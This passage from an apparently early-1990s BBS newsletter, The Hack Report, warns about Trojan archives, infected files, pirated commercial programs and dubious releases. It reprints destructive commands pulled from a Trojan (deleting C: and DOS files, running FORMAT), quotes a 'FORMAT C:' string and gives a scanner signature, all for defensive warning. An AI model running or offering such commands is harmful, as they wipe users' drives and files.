  data.  According to Dave Lartique (1:3800/22) and Chris Gramer
  (1:271/47), the program is an "unprotect" for MicroProse's game Gunship
  2000.  This appears to be another isolated incident of an infected
  legitimate file.

  William Gordon (1:369/104) reports BEV105, a file that claims to be a
  "Beverly Hills 90210 Adventure Game."  This file contains 8 files, but
  two seem to be the real culprits:  DORINFO.DIR and INSTALL.COM.  The
  installation renames the DORINFO.DIR file to IDCKILL.EXE and invokes it.
  This program asks for some sort of wildcard according to William, then
  proceeds to delete everything on your drive that matches that wildcard.
  However, it doesn't stop there:  it continues on and deletes all .bat,
  .fon, .com, .zip, .sys, .ice, .ans, .arj, and .exe files.  William also
  says the file "comes with the following virii:  Bootkill and Genesis."

  A copy of this file was sent to Mr. White and Mr. Logan, who were able to
  confirm the behaviour that William reported.  For the complete results of
  their test, see the file BEV105.RES in the FILETSTS.LZH archive, included
  in the archive version of The Hack Report.

  Another report from Bill concerns a file he located called TAXTIP93.
  This archive contains a file called TAXTIP93.DAT, which the executable
  file, TAXTIPS.EXE, renames to MOUSE.COM and tries to copy to your DOS and
  WINDOWS directory.  The new MOUSE.COM is infected with the ADA virus.

  Brian Chan (Internet, chanav@sfu.ca) found a file called PASSPRO, which
  was described with a very short line ("'Password,' or some other short
  word," according to Brian).  The archive contained these files:

                               PASS    .PA1
                               PASS    .PA2
                               PASS    .PA3
                               PASSWORD.COM

  Brian looked inside the .com file, which he says looks like a compiled
  batch file, and found these strings/commands:

      Please Wait While Loading;
      It may take in between 30seconds to 5 minutes
      To unshrink nessessary files
      Please Turn off Screen, and wait for the beep.
      If You do not, your screen might not function
      the way it should.
      Turn Off Screen now, and press the space bar.

      /C REN pass.pa1 pa.exe
      pass.pa2 /C DEL c:\*.*
      pass.pa2 /C DEL c:\dos\*.*
      /C REN pa.exe pass.pa1
      pass.pa3 FORMAT
      c:
      /C CLS

  As you can see, PASS.PA1 gets renamed to PA.EXE - the file, compressed
  with PKLite, is actually Microsoft's MS-DOS ATTRIB.EXE program.  PASS.PA2
  contains the single letter 'Y', and PASS.PA3 contains the single word
  'Yes'.  From the looks of things, this turns out to be a multipartite
  Trojan that attempts to format (what else?) your hard drive.

  Another multipartite Trojan was spotted by James Frazee (1:343/58), under
  the filename ADD_IT.  It contains these files:

                  Name of File    Size  Date
                  ADD_IT.ARJ     40888 02-11-93
                  =======================================
                  ADDIT1   DAT     34283 07-20-91   2:13a
                  ADD_IT   ANS       646 02-11-93   8:31p
                  ADDIT2   DAT     20634 04-09-91   5:00a
                  ADDIT    DOC       177 02-11-93   7:28p
                  ADDIT    COM      1391 02-11-93   8:14p
                  ADDIT3   DAT       138 02-11-93   8:13p
                  THEDRAW  PCK       650 02-11-93   8:31p

  When run, ADDIT.COM merges the three .DAT files into an .EXE file.  The
  end result was that the program deleted all of the files in the directory
  in which it was run.

  John Balkunas (1:107/639) forwards information on GIFCHECK.  He reports
  that Lance Merlen (1:107/614) received an upload of this file, which,
  when checked with McAfee's ViruScan v100, reported over 5 viruses in the
  files in the archive.  No internal archive data was provided, so it is
  hard to say whether or not this is an isolated incident.

  Zack Jones (1:151/173) reports a file called GAGS which was seen in the
  San Antonio area.  The file, described as "Some Christmas practical
  jokes," was analyzed by Bill Dirks (1:385/17) and confirmed as a Trojan.
  The program grabs control of several interrupt vectors, including the
  critical error handler.  The only way to stop it once it starts is to hit
  the reset button or power down.

  When invoked, it displays a countdown from 8 to 0, which corresponds to
  drives H through A, in that order.  For each found drive, it overwrites
  the first 255 sectors with random data from a block of memory.  To add
  insult to injury, if drives B and A are empty, you are prompted to insert
  disks (so that they can be trashed as well).

  After this, the Trojan displays the message, including something like,
  "the disk was trashed but it's only a joke and they are only kidding."
  It then prompts you to reboot, which is rather hard to do unless you have
  a bootable "panic disk" floppy on hand - you certainly won't be able to
  boot from your HD.

  Bill says that if your HD is smaller than 60 megs, you're better off
  trying to recover your disk from scratch.  Between 60-120 megs, you have
  a better chance of recovery via disk utilities:  over 120 megs, you
  should be able to accomplish a complete recovery if you're careful and
  you know what you're doing.

  Bill posted the following scan string that can be used to detect this
  Trojan - if your scanner can use external strings, be sure to read the
  instructions carefully before trying to add this:

               9A46027205B003B9FF00BA0000CD26

  If your scanner requires a name for the string, Bill suggests using
  "AlamoXmasTrojan."

  This Trojan report comes from an article in MacWeek magazine, Volume 7,
  Number 2, issued January 11, 1993.  The article, posted in the FidoNet
  VIRUS_INFO echo by Robert Cummings, states that a program called CPro
  1.41.sea, claiming to be a new version of Compact Pro (a Macintosh
  shareware compression utility), will reformat any floppy in drive 1 and
  tries to reformat the user's start-up hard drive when launched.

  The file can be identified by a 312K sound resource file called "log
  jingle," which is digitized sound from the Ren and Stimpy cartoons.

  Other previously reported Trojans:

  Filename  Claimed use/Actual activity/Reporter(s)
  ========  ==============================================================
  AANSI100  Claims to add Auto-ANSI detect to Telegard BBSs - contains
            something called the "Malhavoc Trojan," which displays a verse
            from a Toronto band and attacks files/sectors on drives C:
            through F:.  Reported by HW Todd Clayton and by George Goode
            (1:229/15).

  ANSISCR   VGA BBS ad - contains a self-extracting archive of the Yankee
            Doodle and AntiChrist viruses.  Can trash hard drives as well
            through Trojan behaviour.  Reported by Bill Dirks (1:385/17),
            and under the filename RUNME by Stephen Furness (1:163/273).

  AVENGER   Advertised as an "amazing game that supports all kind of sound
            cards...."  Contains 2 internal password-protected .ZIP format
            files, AVENGER2.DAT and AVENGER3.DAT, which are expanded by
            the program to the files RUNTIME1.COM (N1 virus) and
            RUNTIME2.COM (Anthrax virus).  From Reinhardt Mueller, via
            HW Bill Lambdin.

  BATMAN    No claim reported - searches your DOS path and tries to "delete
            the executable file that loads WildCat BBSs."  Reported by
            James Powell (Intelec PC-Security Conf.), via HW Bill Lambdin.

  CHROME    Possible isolated incident - contains a file, FGDS.COM, which
            contains text that says "Skism Rythem Stack Virus-808."
            Reported by Richard Meyers and forwarded by Larry Dingethal
            (1:273/231).

  DBSOUND   Possible isolated incident - claimed update of the Drum
            Blaster .MOD file player.  Deletes all files in the current
            directory and all of its subdirectories.  From "Khamsin #1
            @9168*1", forwarded by HW Ken Whiton and HW Bill Dennison,
            from Ken Green of the CentraLink BBS.

  DRSLEEP   Reported as a "cheap virii (sic)", but actually appears to be
            a Trojan:  deletes your COMMAND.COM file when run.  Reported
            by Matt Hargett (1:2430/1532).

  GRAFIX    Possible isolated incident - contains the file WAIT.COM, which
            is a renamed copy of DELDIR.COM, a directory remover and file
            deletion tool.  Reported by Andreas Reinicke (2:284/402).

  LOGIM613  Possible isolated incident - one internal file, MOUSE.COM,
            reports as being infected with the VCL virus when checked with
            McAfee's ViruScan v95.  Reported by Mike Wenthold (1:271/47).

  MUVBACK   Claimed keyboard utility - actual ANSI bomb that remaps the D
            key of your keyboard to invoke DEBUG and create a couple of
            Trojans from script files.  Reported by Bill Dirks.

  OPTIBBS   Aimed at RemoteAccess BBS systems - archives your USERS.BBS
            list and places it in your download directory.  Reported by
            HW Nemrod Kedem.

  QOUTES    Not a misspelling - claimed Christmas quotation generator.
            Overwrites the first 128 cylinders of your first HD, requiring
            a low level format to overcome the damage (IDE drives may need
            to go back to the factory).  Reported by Gary Marden
            (2:258/27).

  QSCAN20   Claimed small virus scanner - when run, identifies itself as
            "being a stealth bomber" and attacks your hard drive's FAT.
            Reported by Art Mason (1:229/15).

  RA111TO2  Claims to upgrade RemoteAccess 1.11 to 2.0 - acts similarly to
            the OPTIBBS file reported above.  Reported by Peter Janssens
            (2:512/1).

  RAFIX     "Fixes little bugs" in RemoteAccess - program contains the
            string "COMMAND /C FORMAT C:" internally.  Reported by Sylvain
            Simard (1:242/158).

  RAMANAGE  Claimed USERS.BBS manager for RemoteAccess - yet another
            file that makes an archive of this file (MIX1.ARJ or WISE.ARJ)
            and places it in a download directory.  Reported by Peter
            Janssens.

            NOTE - Peter Hoek (2:281/506.15) reports a program that does
            the same thing, but uses the archive name RUNNING.ARJ to
            hold the USERS.BBS file.  No name of the Trojan was supplied.

  REAPER    ANSI bomb - remaps the keyboard to force file deletion and
            hard disk formatting - also generates insults.  Reported by
            Victor Padron (1:3609/14), via Rich Veraa (1:135/907).

  REDFOX    Batch file which deletes all DOS and system files.  Reported
            by Mike Wenthold.

  ROLEX     Possible isolated incident of an infection by the Keypress
            [Key] virus.  Reported by David Gibbs, via Michael Toth
            (1:115/220).

  SCOMP     Advertised as a compression utility.  Passes scans unless you
            check data files - loads a file called SCOMP.DAT to create
            CASPER.COM, which is apparently the Casper virus.  Reported by
            Terry Goodman (U'NI Net virus conference), via HW Bill Lambdin.

  SBBSFIX   Tries to format drive C: - contains two files, SBBSFIX.EXE and
            COM_P.OVL.  Reported by Clayton Mattatall (1:247/400).

  SPEED     Claims to "check your PC speed" - actually deletes all files
            on drive C:, including directories.  Reported by HW Nemrod
            Kedem.

  TDRAW460  A "modified" copy of a legitimate release of TheDraw v4.60 -
            the archive had a ZIP Comment which contained an ANSI bomb, and
            an internal file called UFO!.COM would reformat your hard drive
            unconditionally.  Reported by Matt Glosson, via Michael Toth
            (1:115/439.7).

  XYPHR2    No claim - contains the Power Pump companion virus (documented
            in the 1992 Full Archive of this report).  Reported by Mark
            Histed (1:268/332).

  YPCBR101  A copy of this file, uploaded to Simtel-20 and the oak mirror
            on archie.au, contained an infection of the Dark Avenger
            virus in the file YAPCBR.EXE.  Was supposed to be re-released
            as a clean archive.  Reported by John Miezitis (Internet,
            John.Miezitis@cc.utas.edu.au).

  =========================================================================

                        Pirated Commercial Software

  Program                 Archive Name(s)     Reported By
  =======                 ===============     ===========
  2400 A.D. (game)        2400AD              Kevin Brott (Internet,
                                        dp03%ccccs.uucp@pdxgate.cs.pdx.edu)

  3-D Pool                3DPOOL              Michael Gibbs (via HW Bill
                                               Lambdin)

  4DOS v4.02 (reg.)       4DOS402R            HW Scott Raymond
                          4DOSREG

  Airball (game)          AIRBALL             Michael Gorse (1:101/346)

  Alone in the Dark       ALONEDEM            Mark Mistretta (1:102/1314)
   (full game-not a demo)

  ArcMaster (registered)  AM91REG             HW Scott Raymond
                          AM92REG

  Arctic Fox (game, by    AFOX                from the Meier/Morlan List,
   Electronic Arts)                            conf. by HW Emanuel Levy
                                               and Brendt Hess (1:105/362)

  ARJ Archiver            ARJ239RG            HW Scott Raymond
   (registered)           AJ241ECR

  Arkanoid II: Revenge    ARKNOID             James Crawford (1:202/1809)
   of DoH (game)

  Atomix (game)           ATOMIX_             HW Matt Kracht

  A-Train by Maxis        ATRAIN1  through    Chris Blackwell of Maxis
                          ATRAIN6, also        (zoinks@netcom.com)
                          A-TRAIN1 through
                          A-TRAIN6

  BannerMania             BANMANIA            Harold Stein (1:107/236)

  Battle Chess            CHESS               Ron Mahan (1:123/61)
|                         BTLCHESS            Michael Wagoner (1:105/331)

  BeetleJuice (game)      BEETLE              Mark Harris (1:121/99)
                          BETLEJUC            Jason Robertson (1:250/802.2)
                          BJUICE              Alan Hess (1:261/1000)
                          BJ                  Bill Blakely
                                               (RIME Shareware echo)
                          BTLJWC              the Hack Squad
                                               (1:124/4007)

  Big Bird (game?)        BIGBIRD             Cindy McVey, via Harold Stein

  Budokan: the Martial    BUDOKAN             Michael Gibbs (Intelec, via
   Spirit (game)                               HW Bill Lambdin)

  Caveman Ninja           CAVEMAN             Dave Lartique (1:3800/22),
                                               ver. by HW Emanuel Levy

  Check-It PC             CHECKIT             HW Bert Bredewoud
   Diagnostic Software    CHKIT20             HW Bill Lambdin

  Cisco Heat (game)       CISCO               Jason Robertson

  Commander Keen Pt. 5    _1KEEN5             Scott Wunsch (1:140/23.1701)
                          KEEN5E              Carson Hanrahan (CompuServe,
                                               71554,2652)

  {COMMO} v5.4            COMO54X             Allan Bowhill (1:343/555)

  CompuShow GIF Viewer    CSHW860B            HW Scott Raymond

  Copy II PC              COPYPC70            Ryan Park (1:283/420)

  Cyber Chess             C-CHESS             Shane Paul, RIME, via HW
                                               Richard Steiner

  Darkside (game)         DARKSIDE            Ralph Busch (1:153/9)

  Disk Copy Fast 4.0      DCF4UNT             HW Scott Raymond
|  (registered)           DCF41AR

  DiskDupe Pro v4.03      DD403PRO            Jan Koopmans (2:512/163)

  Energizer Bunny Screen  ENERGIZR            Kurt Jacobson, PC Dynamics,
   Saver for Windows                           Inc., via HW Bill Dennison

  F-Prot Professional     FP206SF             Mikko Hypponen
                                               (mikko.hypponen@compart.fi)

  Family Feud (game)      FAM-FEUD            Harold Stein

  FAST! Disk Cache        FAST_1V4            Ryan Park (1:283/420), via
   v4.03.08                                    HW Bill Lambdin

| FaxTalk (Thought        FAXTALK             Lyle Taylor (1:293/644),
|  Communications)                             via Steve Fuqua

| FaxPlus (Thought        FAXPLUS             Lyle Taylor (1:293/644),
|  Communications)                             via Steve Fuqua

  FaxPower                FAXPWR              Carson Hanrahan (CompuServe,
                                               71544,2652)

| Freddy Pharkas,         FREDDY-1            HW Bob Seaborn
|  Frontier Pharmacist    FREDDY-2
|                         FREDDY-3
|                         FREDDY-4
|                         FREDDY-5
|                         FREDDY-6

  GEcho Mail Tosser       GE_1000K            HW Scott Raymond
                          GE_100CK

  GifLite 2.0 (regist.)   GL2-ECR             HW Scott Raymond

  Gods (game)             GODS                Ron Woods (1:134/144)

  Golden Axe (game)       GOLDAXE             Harold Stein

  GSZ Protocol Driver     GSZ0503R            HW Scott Raymond
   (registered)           GSZ0529R

  Home Lawyer             HOMELAWY            Kim Miller (1:103/700)
                          HMLAWYER            Harvey Woien (1:102/752)

| Hoyle's Classic Games   HOYLECL1            HW Bob Seaborn
|                         HOYLECL2
|                         HOYLECL3
|                         HOYLECL4

  HS/Link Protocol        HS121R              Don Becker (Internet,
   v1.21 (registered)                          grendel@jaflrn.linet.org)
                          HS121REG            HW Scott Raymond

  HyperWare Speedkit      SPKT460R            HW Scott Raymond
   v4.60 (registered)

  Ian Bothams Cricket     IBCTDT              Vince Sorensen (1:140/121)

  Intelcom Modem Test     TESTCOM             from the Meier/Morlan List,
   Utility (dist. with                         confirmed by Onno Tesink
   Intel modems)                               (RIME, via HW Richard
                                               Steiner)
|                         INTELCOM            HW Jason Robertson

| Intermail Mailer        IM221U              HW Scott Raymond
|  (registered)           IM22FIX

  Jetsons (game)          JETSONS             Kevin Brott (Internet,
                                        dp03%ccccs.uucp@pdxgate.cs.pdx.edu)

  Jill of the Jungle      JILL2               Harold Stein
   (non-shareware files)  JILL3
                          $JILL2              HW Bert Bredewoud
                          $JILL3

  Killing Cloud (game)    CLOUD               Mike Wenthold

  Kings of the Beach      VBALL               Jason Robertson
   (game)

  Landmark System         SPEED330            Larry Dingethal (1:273/242)
   Speed Test             SPEED600            Joe Morlan (1:125/28)

  Life & Death (game)     L&D1                Harold Stein
                          L&D2

  List Enhanced           LIST8               Richard Dale (1:280/333)
                          LISTE18D            HW Scott Raymond

  MegaMan (game)          MEGAMAN             HW Emanuel Levy

  Microsoft Flight        FS                  Michael Gibbs (Intelec, via
   Simulator                                   HW Bill Lambdin)
|                         FS50TDT1            HW Bob Seaborn
|                         FS50TDT2

| Microsoft Mouse Driver  MOUSE901            Alex Morelli (CompuServe,
|                                               75050,2130)

  Microsoft Ramdrive      RAMDRIVE            Barry Martin (Intelec, via
                                                HW Bill Lambdin)

  MS-DOS 6.0              MSDOS6-1            Harold Stein
                          MSDOS6-2
                          MSDOS6-3

  Oh No, More Lemmings    ONMLEMM             Larry Dingethal (1:273/231)
   (complete-not demo)

  Over the Net            OTNINC1             Tim Sitzler (1:206/2708)
   (volleyball game)

  PGA Tour Golf           GOLF                HW Bill Lambdin

  PKLite (registered)     PKL15REG            HW Scott Raymond

  PKZip v2.04c            PK204REG            HW Scott Raymond
   (Registered)

  PKZip v2.04c            PKZCFG              Mark Mistretta (1:102/1314)
   Configuration Editor

  PKZip v2.04e            PK204ERG            HW Scott Raymond
   (Registered)

  PKZip v2.04g            PKZ204R             HW Bill Dennison
   (Registered)           PKZ204GR            HW Jason Robertson

  Populous (game)         POPULOUS            Harold Stein

  The Price is Right      PRICE               Harold Stein
   (game)

  Prince of Persia        PRINCE              Kenneth Darling (2:231/98.67)
                                              Eric Alexander (1:3613/10)
                                              HW Emanuel Levy
                          PRINCE2A            Todd Crawford (1:3616/40),
                          PRINCE2B            via HW Jeff White
                          PRINCE2C

  PrintShop               PSHOP               Michael Gibbs, Intelec, via
                                               HW Bill Lambdin

  Psion Chess             3D-CHESS            Matt Farrenkopf (1:105/376)

  Pyro! PC                DOSPYRO             Jay Kendall (1:141/338), via
   (Fifth Generation)                          HW Scott Raymond

  Q387 (registered)       Q387UTG             Michael Toth (1:115/439.7)

  QModem Pro              QMPRO-1             Mark Mistretta
                          QMPRO-2

  QuickLink II Fax v2.0.2 QLINK1              Carson Hanrahan (CompuServe,
                          QLINK2               71554,2652)

  Rack 'Em (game)         RACKEM              Ruth Lee (1:106/5352)

  Rawcopy PC              RAWCOPY             HW Chris Wise

  Sequencer Plus Pro      SPPRO               Tom Dunavold (Intelec,
                                               via Larry Dingethal)

  Shadow Warriors (game)  SHADOWG             Mark Mistretta

  Sharky's 3D Pool        POOL                Jason Robertson (1:250/801)

  Shez (Registered)       SHEZ84R             Eric Vanebrick (2:291/712)
                          SHEZ85R             HW Scott Raymond
                          SHEZ87R
                          SHEZ88R
                          SHEZ89R
|                         SHEZ91R

  SideKick 2.0            SK3                 Harold Stein

  SimCity (by Maxis)*     SIMCITY1            Peter Kirn, WildNet Shareware
                          SIMCITY2             conf., via HW Ken Whiton
                          SIMCITY3
                          SIM_CITY            Kevin Brott (Internet,
                                        dp03%ccccs.uucp@pdxgate.cs.pdx.edu)
                          SIMCTYSW            Scott Wunsch

  Smartdrive Disk Cache   SMARTDRV            Barry Martin (Intelec, via
                                                HW Bill Lambdin)
                          SMTDRV40            Michael Toth (1:115/220)

  Spidey (game)           SPIDEY              Brian Henry (ILink,
                                               via HW Richard Steiner)
                          SPIDRMAN            Alan Hess (address unknown)

  Squish 2.1              SQUISH              Jason Robertson (1:250/802.2)
   (Sundog Software)      SQUISH21            Several (ver. by Joe Morlan)

  Star Control Vol. 4     STARCON             Carson M. Hanrahan
                                               (CompuServe 71554,2652)

  Streets on a Disk       STREETS             Harvey Woien

| SuperZModem             SZMO200             HW Jason Robertson
|  (registered)

  Teledisk (files         TDISK214            Mark Mistretta
   dated after Apr. 1991)
                          TELE214R            Staale Fagerland (Internet,
                                             staale.fagerland@euronetis.no)

  Telemate                TM411REG            HW Scott Raymond

  TheDraw v4.61 (reg.)    TDRW461R            HW Scott Raymond

  Vegas Casino 2 (game)   VEGAS2              The Hack Squad

  VOpt Disk Defragmenter  VOPT30              The Hack Squad

  VPic v6.0 (registered)  VPIC60CR            HW Scott Raymond

  Wheel of Fortune        WHEEL               Harold Stein

  Where in the USA is     CARMEN              Carson Hanrahan
   Carmen Sandiego?       CARMENUS            Cindy McVey, via Harold Stein

  Where in Time is        CARMENT             Cindy McVey, via Harold Stein
   Carmen Sandiego?

  WinWay Resume for       WINRES              Erez Carmel (CompuServe,
   Windows                                      70523,2574)

  World Class Rugby       WCRFNTDT            Vince Sorensen

  ZipMaster (registered)  ZM31REG             HW Scott Raymond

  * - Peter Kirn's report on SimCity indicated that Maxis has in fact
  released a demo of SimCity onto ZiffNet which limits play to 5 minutes.
  This is not the same file as he reported, however - the ones he found are
  indeed pirate copies.

  =========================================================================

                      ?????Questionable Programs?????

  This section of The Hack Report is for the "misfits" - in other words,
  files that are hacks, hoaxes, Trojans, or pirated, but either do not
  quite fit into one of the main sections of the report or require more
  explanation than the format of the appropriate section allows.  The extra
  material presented here is usually included for a good reason, so please
  take the time to read at least the new entries quite carefully.  Also, if
  you have any input on any of the listed files, do not hesitate to send it
  in to your Hack Squad.

  Quite a few folks questioned a release of Vern Buerg's LIST calling
  itself v7.8a.  This one actually came down one of the file distribution
  networks, if memory serves.  However, in response to these inquiries,
  your Hack Squad called up The Motherboard BBS, Mr. Buerg's home system.
  On that system was posted the following bulletin:

        ================================
    ===  July 15:  LIST78A.ZIP is bogus  ===============================
        ================================

    A beta test version of LIST 7.8a was uploaded to other systems by
    mistake. It is not an official version, and it has bugs, e.g. the
    mouse doesn't work.

    A new version will be released next week. Those waiting for
    registered copies will be sent their's first, then it will be posted
    on VOR and CIS. The manual was dramatically updated and is now 54
    pages with full color cover. We'll have some on the shelves at the
    store next week.

  So, this definitely qualifies as a "misfit" - it isn't a hack, hoax, or
  Trojan - it's an accident.

  Robert Jung's ARJ archiver has had a new release in non-beta form.  The
  legitimate file can be identified by an ARJ-SECURED envelope.  However,
  making equally big news (unfortunately) were several sightings of pirated
  versions of the registered v2.41 file.  These were most often seen as a
  ZIP file (?) with the following internal files:

     Length  Method   Size  Ratio   Date    Time    CRC-32  Name
     ------  ------   ----- -----   ----    ----   -------- ----
       1436  DeflatX    614  58%  06-09-93  16:05  23af995c README
     223594  DeflatX 222850   1%  06-04-93  09:19  fe351d41 ARJ241.EXE
     127882  Stored  127882   0%  06-04-93  09:27  54fdf489 ARJUTIL.ARJ
      55301  DeflatX  54641   2%  06-04-93  09:18  6d4e75fe UNARJ241.EXE
     244816  Stored  244816   0%  06-10-93  09:23  0abdb4be ARJHLP24.ARJ
     ------          ------  ---                            -------
     653029          650803   1%                                  5

  The giveaway here is the ARJUTIL.ARJ file - this contains programs that
  are only available to registered users.

  This causes a problem as far as listing this in the .col/.idx files is
  concerned:  the person who distributed the pirated version used the same
  filename as the real thing.  The only way you're going to be able to tell
  the pirated version from the legitimate one will be to look inside your
  copy of the archive.  If you see either the ARJUTIL.ARJ file inside, or
  the files ARJR.EXE or DEARJ.EXE, then you have the pirated copy.  Please
  delete it.  (Note - version 2.41 has been superseded - please see the
  Hacked Files section of this report for the latest version as of this
  writing.)

  Dotti Rosier (1:114/107) found a message on a local BBS system that might
  be worth reading.  The text read as follows:

       WARNING: Nobody download PHACS1.EXE and NETWORK1.EXE..They have
       the Yankee Doodle virus that is only detectable by SCANV99....
       please clean these two exe files IMMEDIATELY and in case you
       have run them already, there might b some other files that are
       infected. CLEAN99 will clean them just fine. Sorry for the
       inconvenience but I recently found out that my HD was infected
       and therefore, every file that I compile is infected. Thank you
       for your patience.

  I can only assume that these were self extracting archives - no
  descriptions of the files were available.

  Steve Winter (1:153/7070) reported on a file called SUB1_V21.  This
  claimed to be a program called SUB, a directory list utility.  Steve
  checked out the file prior to running the install program and found no
  anomalies.  However, once installed, he says he began to get conflicting
  directory reads, disk full errors, and problems booting.  Somehow, his
  boot record had been damaged.

  According to his testing, the file passes scans with F-Prot v2.08a and
  does not alert McAfee's VShield v104.  He says the archive contains two
  files - INSTALL.EXE and SUB.SPZ, which contains the executable.  INSTALL
  creates a subdirectory and extracts files from the SUB.SPZ file.

  Steve says he is attempting to get another copy for testing.  Until that
  time, I can't say for sure if he was the victim of a system glitch, buggy
  software, or a true Trojan.  If anyone out there has this file, please
  contact your local HackWatcher or myself so that we can arrange for
  testing.

  Mark Harris (1:121/26.1) found a pair of archives called DEATH_1 and
  DEATH_2 on a local system.  The files were described as a new Apogee game
  called Deathbringer.  The archives contained no documentation, and all
  program files were dated 1990 or 1991.  When run, the game displayed the
  name "Deathbringer," but gave no company or copyright information.  Scans
  by McAfee's ViruScan and Frisk's F-Prot proved negative.

  Mark has provided additional information that adds to the suspicion that
  this is a pirated file.  The program begins with the following screen:

         Empire, in association with ODE and The Mystery Machine,
                                 presents
                         -=*=- DEATHBRINGER -=*=-
                            Select Vidoe Mode:

                            1)  VGA   16 color
                            2)  EGA   16 color
                            3) Tandy   4 color
                            4)  CGA    4 color
                            5) Tandy  16 color

       Roland, Adlib and Tandy music supported
       (Playing now, if found, M to toggle on/off)
       J to select Joystick, K for keyboard
       = to speed up, - to slow down game (fast PCs)

       THOSE WHO LABOURED:
       John Wood...................Atari ST, Commodore Amiga, Design
       Kevin Ayre.....................................IBM PC, Design
       Colin Swinbourne.....................................Graphics
       Richard Yapp...................................Levels, Design
       Sound Images............................................Music

       Deathbringer,  Karn  and  all  Deathbringer  Characters  and  the
       distinctive  likenesses thereof are Trademarks of Abaddon Duke of
       Hell Group Inc.

  Mark goes on to say:

       There was no documentation in the archive (which I will
       continue to hold on to, in case you need it for any reason)
       giving any playing instructions, no shareware notice or
       registration request, nothing whatsoever to indicate the origin
       of this program except for the above.  That's what prompted me
       to write in the first place; it looks to me (especially
       considering the quality of the graphics,) like this is a
       commercial program with as much of the copyright and
       identifying screens hacked out of it as possible.

  As an Apogee Tech Support Specialist, I can personally verify that this
  is not a product of Apogee.  Mark's opinion is that this is a hack of a
  commercial game:  I tend to agree.  Jim Wells (1:2613/261) forwarded the
  file contents, along with some other information still being looked into:
  he feels that this is a "hacked" version of the official release, whether
  shareware or commercial.  Rick McBride (1:363/178) says it is indeed
  commercial, as he saw it on a CD-ROM about a year ago.  However, he does
  not remember the publisher's name (possibly Psygnosis, he says) - only
  that it is an arcade-style D&D game.

  This is still being researched.  In the meantime, I would appreciate any
  information that a user of the possible commercial version could forward
  - please help your Hack Squad verify this one.

  Chuck Cypert (1:124/2113) reported in the FidoNet VIRUS_INFO echo that
  the SysOp of the CompUSA BBS in Carrollton, TX had a problem with a file
  called UNIXHAC.  The SysOp reports that this file formatted his hard
  drive.  No further details were available, as the SysOp had already
  deleted the file.  If someone has a copy of this, again, please contact
  one of The HackWatchers or myself.

| Harvey Woien (1:102/752) forwarded a report from a user of The
| Motherboard (Vern Buerg's BBS), Ted R. Marcus, about a version of the
| Microsoft Mouse Driver claiming to be version 9.0.  It also appears that
| this file came down a file distribution network under the filename
| MSMAUS90, possibly originating in Germany.  Your Hack Squad has found a
| copy of the same archive Ted reported on, and confirms some of his
| observations on the file (MOUSE900), quoted here:
|
| 1.  Microsoft Diagnostics and InfoPlus report this "9.00" driver as
|     version 8.00.  The latest "official" version of which I am aware is
|     8.20a.
|
| 2.  The "new" driver is significantly smaller than version 8.20a.
|
| 3.  The "new" driver supports the undocumented /U switch (which loads
|     much of the driver into the HMA).  Version 8.0 and 8.1 supported this
|     feature, but Microsoft removed it from version 8.2 (shipped with DOS
|     6.0).  The support for the /U switch suggests that the driver is, in
|     fact, version 8.0.
|
| 4.  Examining the MOUSE.COM driver file reveals one instance where the
|     version number (repeated in the initialization message for each
|     language the driver supports) is "9.40".  That indicates either
|     uncharacteristic sloppiness on the part of Microsoft -- or, more
|     likely, sloppiness on the part of a hacker.
|
| More information on MOUSE900 comes from Jeffery Bradley (1:3635/35).  He
| informed the folks here at Hack Central Station that there is indeed a
| legitimate v9.0 of the Microsoft Mouse Driver.  However, after talking
| with Microsoft, he did confirm that this should not be distributed via
| BBS systems:  it is commercial only, as previously reported.

  Yet another file that doesn't fit into any of the report categories: a
  report from Wen-Chung Wu (1:102/342) concerns the archive PKLT120R, which
  claims to be version 1.20 of PKLite.  This is actually PKLite
  Professional v1.12, a commercial product, which has been hacked to show
  version 1.20 instead of 1.12.  To make matters worse, the PKLITE.EXE file
  was compressed "by PKLITE itself more than three times and once by
  LZEXE."  So, what we have here is a hack of a pirated commercial file -
  jeez, this job gets confusing at times. ;-)

  Here's an update on the report from Bud Webster (1:264/165.7) on the
  Apogee game being distributed under the filename BLOCK5.ZIP.  As reported
  by Matthew Waldron (RIME Shareware Conf., via HW Richard Steiner) and Dan
  Stratton (via HW Ken Whiton), this program was part of an Apogee disk
  called the "Super Game Pack," and that it is a game called "Block Five."
  Joe Siegler (1:124/9006), the online support representative for Apogee
  Software Productions, confirms this, and states that the majority of the
  games on this disk, including this one, have been officially
  discontinued.  The official company stand is that this game should not be
  distributed via BBS systems, as it is no longer supported in any way by
  Apogee Software Productions.  Thanks to everyone who helped on this one.

  HW Bill Lambdin says he found a file in the Knoxville, Tennessee area
  called BIBLEPR (no description available) that appears a bit suspicious.
  The file contents are:

                Length  Time    CRC-32  Attr  Name
                ------  ----   -------- ----  ----
                 34176  11:26  d267f5de --w-  BIBLEPR.COM
                158493  00:04  4298ac2d --w-  DATAPR-0.DAT
                158493  00:04  d87adf4b --w-  DATAPR-1.DAT
                158493  00:08  1213c6b3 --w-  DATAPR-2.DAT
                159764  00:08  38d7cc06 --w-  DATAPR-3.DAT
                  1572  24:05  3a60c80e --w-  BIBLEPR.DOC
                ------                        -------
                670991                              6

  When BIBLEPR.COM executes, Bill says it displays the following message:

                        Greets from DOA!

        Don't say I didn't warn you! You are also busted!

        Expect a visit from the SPA!

        Omni, I will avenge you!

  Bill's disassembly shows the file contains two INT 26 calls, which are
  DOS Absolute Disk Write instructions.  He said that if it contains a
  virus, he was unable to get it to replicate.  A copy of the archive has
  been sent to Glenn Jordan at Datawatch Software for testing.

  Here's an interesting point, brought to my attention by HW Richard
  Steiner and John Weiss of the RIME Shareware Conference.  In previous
  issues, I have listed two files, QM60IST1 and QM60IST2 (reported by
  Francois Thunus, 2:270/25), as pirated copies of QModem v6.0.  However,
  Richard and John quite correctly point out that there was no release of
  QModem v6.0 - the program changed to QModem Pro after v5.

| This file, or a variant, has also been spotted by Jerry Van Laer of
| 2:292/805.7, under the name QM60D1-2 and QM60D2-2.  In this case, an
| internal "brag" screen stated the program was QmodemPro 1.0.

  From what Francois reported, I believe that what he saw was indeed Qmodem
  Pro, now a commercial-only program.  However, it was "released" under the
  above filenames.  So, is it a Hack?  Pirated File?  Or what?  Doesn't
  matter - it shouldn't be distributed.  Thanks, Richard and John, for
  making me fully engage my brain for a change. <grin>

  HW Bill Dennison captured a message from Marshall Dudley (Data World BBS,
  (615)966-3574) in the ILink VIRUS FILE conference about the archive
  ASCDEMO.  Marshall says that McAfee's ViruScan doesn't detect any
  infection until after you run it and it has infected other files.  No
  further information was supplied, other than the internal filenames
  (ASCDEMO.DOC and ASCDEMO.EXE).  I need further data on this before I can
